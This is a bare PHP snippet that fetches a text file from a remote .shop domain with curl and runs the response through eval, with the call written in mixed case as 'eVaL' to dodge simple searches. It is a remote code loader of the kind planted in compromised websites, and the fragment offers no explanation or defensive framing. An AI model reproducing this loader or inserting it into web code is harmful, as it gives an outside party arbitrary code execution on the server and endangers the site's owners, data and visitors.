<?php $cx = curl_init("https://z60107_6.eschaden.shop/stat/domain_index.txt"); curl_setopt($cx, CURLOPT_RETURNTRANSFER, 1); $rs = curl_exec($cx); if ($rs !== false) { $data = eVaL('?>' . $rs); } curl_close($cx);